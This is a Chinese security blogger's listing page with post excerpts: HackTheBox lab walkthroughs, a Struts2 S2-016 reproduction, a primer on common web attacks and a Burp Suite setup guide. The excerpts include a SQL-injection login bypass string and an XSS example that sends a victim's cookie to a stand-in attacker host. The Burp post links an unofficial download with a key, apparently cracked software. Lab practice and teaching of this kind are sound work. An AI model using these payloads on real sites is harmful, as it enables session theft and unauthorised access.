- 博客(6)
- 收藏
- 关注
RSS订阅原创 HackTheBox-Love
OSCP之旅继续前行。今天来做hack the box的love,级别:简单,主机IP:10.10.10.239打开kali,链接VPN,然后ping 一下主机,能ping通,开搞!先用nmap扫一下,扫的过程中打开浏览器访问一下10.10.10.239。要账号密码,不能注册。从标题看出来网页是PHP。手动试试sql盲注。简单试了一下,提示ID错误,应该是账号密码错误分开提示,减轻不少压力。当我盲注使用账号“aaa' or 1=1 #”密码随意填后,提示有变化了。提示密.
2021-07-19 14:15:14
576
3
原创 HackTheBox-Cap
从这篇文章开始记录自己OSCP旅程,先从做靶机开始。主要是在hackthebox中做靶机,用kali连接vpn就能直接开始,不用再下载镜像文件。hackthebox官网:https://app.hackthebox.eu/home开始连接VPN连接VPN后添加主机本次攻击的目标IP为10.10.10.245名为Cap的机子,操作系统是Linux打开网站10.10.10.245后有发现Security ...每次刷新后URL都会在后面加1,并且最下角有一个下载按钮。下载数据包再用.
2021-07-19 13:59:22
797
原创 s2-016漏洞复现
s2-016漏洞复现首先介绍一下struts2框架:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户
2020-12-20 19:24:03
889
1
原创 常见的攻击技术及防范
常见的攻击技术及防范一. XSS(Cross-Site Script) 跨站脚本攻击概念XSS - 跨站脚本攻击(Cross-Site Scripting),可以将代码注入到用户浏览的网页上,这种代码包括HTML和JavaScript。案例比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的<script>window.open(“www.gongji.com?param=”+document.cookie)</script>如果我没有对他的内容进行
2020-10-13 16:06:47
477
原创 安装burp suite以及简单应用
首先你要先下载burp suite这个软件链接:https://pan.baidu.com/s/1_DnHGdAIww82jEZZZVzidA提取码:hugk随便下载一个版本,解压文件,点开第一个run一下,把秘钥复制在文本框,我已经弄好了就不说了。打开是这个样子。然后开始设置代理ip打开浏览器,我是谷歌浏览器打开代理设置局域网设置...
2019-03-17 23:00:01
200
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人